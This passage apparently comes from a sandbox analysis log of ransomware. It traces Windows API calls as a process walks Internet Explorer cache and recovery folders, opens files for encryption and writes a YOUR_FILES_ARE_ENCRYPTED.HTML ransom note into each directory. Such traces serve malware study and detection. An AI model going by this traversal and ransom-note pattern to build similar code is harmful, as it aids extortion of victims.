nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.167] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xa7440614, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7440614, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7446414, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.167] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa7446414, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7446414, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7446414, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0111.167] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.167] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\container.dat") returned 98 [0111.167] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.167] lstrlenW (lpString=".dat") returned 4 [0111.167] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0111.167] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\ieflipaheadcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0111.168] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=0) returned 1 [0111.168] CloseHandle (hObject=0x32c) returned 1 [0111.168] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa7446414, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xa7446414, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xa7446414, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0111.168] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.168] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0111.168] GetProcessHeap () returned 0x600000 [0111.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\IEFlipAheadCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\ieflipaheadcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.169] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.170] CloseHandle (hObject=0x31c) returned 1 [0111.170] GetProcessHeap () returned 0x600000 [0111.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.170] GetProcessHeap () returned 0x600000 [0111.170] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.171] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="imagestore", cAlternateFileName="IMAGES~1")) returned 1 [0111.171] StrStrIW (lpFirst="imagestore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.171] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore") returned 78 [0111.171] GetProcessHeap () returned 0x600000 [0111.171] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.172] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore" [0111.172] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\*" [0111.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.173] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.173] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="4nqtinl", cAlternateFileName="")) returned 1 [0111.173] StrStrIW (lpFirst="4nqtinl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.173] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl") returned 86 [0111.173] GetProcessHeap () returned 0x600000 [0111.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0111.174] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl" [0111.174] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl\\*" [0111.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x626838 [0111.174] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0111.174] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631188, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 0 [0111.175] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0111.175] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0111.175] GetProcessHeap () returned 0x600000 [0111.175] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\4nqtinl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\imagestore\\4nqtinl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.175] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.177] CloseHandle (hObject=0x32c) returned 1 [0111.178] GetProcessHeap () returned 0x600000 [0111.178] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.178] GetProcessHeap () returned 0x600000 [0111.178] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.179] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52285f69, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52285f69, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52285f69, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="4nqtinl", cAlternateFileName="")) returned 0 [0111.179] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.179] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.179] GetProcessHeap () returned 0x600000 [0111.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\imagestore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\imagestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.180] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.181] CloseHandle (hObject=0x31c) returned 1 [0111.181] GetProcessHeap () returned 0x600000 [0111.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.181] GetProcessHeap () returned 0x600000 [0111.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.182] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009b9ab, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009b9ab, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5009b9ab, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Recovery", cAlternateFileName="")) returned 1 [0111.182] StrStrIW (lpFirst="Recovery", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.182] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned 76 [0111.182] GetProcessHeap () returned 0x600000 [0111.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.183] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery" [0111.183] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*" [0111.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009b9ab, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009b9ab, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5009f3d3, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.183] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009b9ab, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009b9ab, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5009f3d3, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.183] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009f3d3, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009f3d3, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5009f3d3, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="Active", cAlternateFileName="")) returned 1 [0111.183] StrStrIW (lpFirst="Active", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.184] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned 83 [0111.184] GetProcessHeap () returned 0x600000 [0111.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0111.185] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active" [0111.185] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*" [0111.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009f3d3, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009f3d3, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x55950e40, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.185] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009f3d3, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009f3d3, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x55950e40, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0111.185] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x500a1aa4, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x500a1aa4, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x914ffe74, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName="RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat", cAlternateFileName="RECOVE~1.DAT")) returned 1 [0111.185] StrStrIW (lpFirst="RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.185] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat") returned 140 [0111.185] PathFindExtensionW (pszPath="RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.185] lstrlenW (lpString=".dat") returned 4 [0111.185] PathFindExtensionW (pszPath="RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.185] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0111.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\RecoveryStore.{8D617CD4-7674-11EB-B0B5-0011F4BD9832}.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\recoverystore.{8d617cd4-7674-11eb-b0b5-0011f4bd9832}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0111.186] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509604e8, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x509604e8, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x523ad65a, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName="{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat", cAlternateFileName="{8D617~1.DAT")) returned 1 [0111.186] StrStrIW (lpFirst="{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.186] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat") returned 126 [0111.186] PathFindExtensionW (pszPath="{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.186] lstrlenW (lpString=".dat") returned 4 [0111.186] PathFindExtensionW (pszPath="{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.186] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0111.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{8D617CD6-7674-11EB-B0B5-0011F4BD9832}.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\{8d617cd6-7674-11eb-b0b5-0011f4bd9832}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0111.186] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5594e739, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5594e739, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x56323a62, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName="{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat", cAlternateFileName="{8D617~2.DAT")) returned 1 [0111.186] StrStrIW (lpFirst="{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.186] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat") returned 126 [0111.186] PathFindExtensionW (pszPath="{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.186] lstrlenW (lpString=".dat") returned 4 [0111.186] PathFindExtensionW 